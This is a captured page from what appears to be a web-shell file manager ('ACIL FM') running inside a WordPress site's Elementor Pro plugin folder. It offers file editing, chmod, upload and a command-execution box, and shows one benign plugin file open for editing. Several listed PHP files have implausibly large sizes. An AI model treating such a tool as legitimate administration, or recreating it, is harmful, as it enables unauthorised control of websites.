ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/elementor-pro/modules/notes
/
home
mhhtmff
www
site
wp-content
plugins
elementor-pro
modules
notes
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
assets
-
chmod
Open
Rename
Delete
data
-
chmod
Open
Rename
Delete
database
-
chmod
Open
Rename
Delete
notifications
-
chmod
Open
Rename
Delete
user
-
chmod
Open
Rename
Delete
admin-bar.php
672 B
chmod
View
DL
Edit
Rename
Delete
admin-page.php
3.57 MB
chmod
View
DL
Edit
Rename
Delete
document-events.php
2.69 MB
chmod
View
DL
Edit
Rename
Delete
module.php
6.65 MB
chmod
View
DL
Edit
Rename
Delete
usage.php
7.79 MB
chmod
View
DL
Edit
Rename
Delete
utils.php
2.36 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/elementor-pro/modules/notes/admin-bar.php
<?php namespace ElementorPro\Modules\Notes; use ElementorPro\Modules\Notes\User\Capabilities; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Admin_Bar { /** * Register actions and hooks. * * @return void */ public function register() { add_action( 'admin_bar_menu', function ( \WP_Admin_Bar $wp_admin_bar ) { if ( is_admin() || ! current_user_can( Capabilities::READ_NOTES ) ) { return; } $wp_admin_bar->add_node( [ 'id' => 'elementor_notes', 'title' => esc_html__( 'Notes', 'elementor-pro' ), 'href' => '#', // Click event is handled by JS. ] ); }, 200 ); // Before "Elementor Debugger". } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply